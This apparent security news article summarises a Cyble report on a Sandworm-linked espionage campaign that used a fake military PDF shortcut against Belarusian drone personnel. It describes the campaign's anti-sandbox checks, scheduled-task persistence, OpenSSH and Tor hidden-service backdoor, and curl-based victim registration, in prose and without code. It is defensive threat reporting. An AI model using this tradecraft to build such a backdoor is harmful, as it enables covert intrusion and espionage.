Ddos 
Researchers at Cyble Research and Intelligence Labs (CRIL) have identified a sophisticated malware campaign that leverages weaponized ZIP archives disguised as military training documents to infiltrate systems belonging to Belarusian Special Operations Command personnel specializing in UAV and drone operations.
The report, released in October 2025, reveals that the attackers employed advanced anti-analysis methods, Tor-hidden communication infrastructure, and OpenSSH for Windows to establish persistent, anonymous remote access to compromised hosts.
“The attack utilized a Belarusian military lure document targeting Special Operations Command personnel specializing in UAV/Drone operations, suggesting intelligence collection operations focused on regional military capabilities,” CRIL stated.
The infection begins with a ZIP archive titled “ТЛГ на убытие на переподготовку.pdf” (“TLG for departure for retraining”), which appears to be an official Belarusian military document. Inside, the file uses a double extension technique — a common deception tactic — to appear as a PDF while actually functioning as a malicious Windows LNK shortcut.
Upon execution, the LNK file triggers obfuscated PowerShell commands, which extract hidden archives containing additional payloads and configuration files. CRIL explains that “this multi-stage attack employs advanced evasion techniques, including double file extensions, anti-sandbox checks, and obfuscated PowerShell execution, to establish persistent backdoor access on targeted systems.”
The PowerShell scripts validate system conditions before continuing, checking whether the system has at least ten shortcut files and over 50 running processes. These checks ensure the malware only executes on genuine workstations, terminating itself in sandboxed or virtual analysis environments.
While the malicious payloads run in the background, the victim is shown a decoy PDF document to maintain legitimacy. This decoy contains instructions for military retraining and UAV flight procedures, aligning with the operation’s thematic focus on drone warfare.
“The decoy PDF reveals a specific targeting strategy focused on the Belarusian military sector,” CRIL reported. “The document’s potential targets are likely personnel within the Special Operations Command of the Belarusian Air Force who possess operational expertise in unmanned aerial vehicle (UAV) or drone operations.”
After the decoy opens, the malware installs a scheduled task that ensures persistence, executing on system logon and daily at 10:21 AM UTC. Two distinct tasks are then initiated:
Task 1 – OpenSSH Deployment
The malware launches a Microsoft-signed OpenSSH binary (githubdesktop.exe) configured to listen on port 20321 (localhost). The configuration allows only RSA key-based authentication, preventing password-based access and restricting logins to pre-generated keys embedded within the archive.
“Despite its benign filename suggesting legitimate software, githubdesktop.exe is actually the OpenSSH for Windows binary, digitally signed by Microsoft to evade security detection,” CRIL confirmed.
Through this SSH configuration, the attackers can execute remote commands, upload and download files via SFTP, and explore network shares through SMB — all while maintaining stealth.
Task 2 – Tor Network with Obfs4 Bridge
The malware deploys a customized Tor executable (pinterest.exe) that creates a hidden service (.onion address) to route all communication through the Tor network. It exposes multiple services over this anonymized channel:
- Port 20322 → SSH
- Port 11435 → SMB
- Port 13893 → RDP
- Ports 12192 / 14763 → custom backdoors
A critical improvement over earlier campaigns is the inclusion of obfs4 pluggable transport, which disguises Tor traffic as regular web activity.
“The implementation of advanced pluggable transport effectively hides Tor traffic as normal network activity, making detection significantly more challenging,” CRIL noted.
Once the backdoor is active, the malware constructs a unique .onion URL identifying each compromised host and sends this information to the attacker via a curl command routed through the local Tor SOCKS5 proxy.
The transmitted data includes the victim’s username, the generated Tor hidden service address, and a campaign identifier.
“The curl command is configured with aggressive retry logic — 1000 attempts with 3-second delays — to ensure reliable delivery even under adverse network conditions,” CRIL detailed.
Upon successful registration, the attacker gains comprehensive remote control, with the ability to access the victim system through SSH, RDP, SMB, or SFTP.
Cyble analysts identified strong overlaps between this October 2025 sample and the December 2024 “Army+” campaign attributed to Sandworm (APT44 / UAC-0125) — a notorious Russian state-sponsored threat group linked to GRU Unit 74455.
“CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44),” the report stated.
Sandworm has a long history of high-profile operations, including the BlackEnergy power grid attacks (2015), NotPetya (2017), and the Kyivstar telecom breach (2023).
The current campaign shows technical improvements over previous Sandworm tactics:
- Use of obfs4 bridges for improved anonymity
- Pre-generated RSA keys for faster deployment and smaller forensic footprints
- Automated persistence through scheduled tasks
“These updates demonstrate the TA’s adaptability and commitment to enhancing operational security in response to evolving detection capabilities,” CRIL added.
Although no secondary payloads were observed during testing, Cyble’s team successfully connected to a test instance of the malware via SSH to verify its backdoor functionality. This suggests that the operation is likely in its reconnaissance or pre-exploitation phase.
“The backdoor was tested by establishing a controlled SSH connection… The connection provided full command-line access through the Tor-anonymized channel, confirming the backdoor’s operational functionality,” the researchers explained.
Given the military-themed lure and regional focus, Cyble assesses that the operation is part of ongoing espionage targeting Eastern European defense sectors, possibly aimed at UAV and communications intelligence gathering.
Donate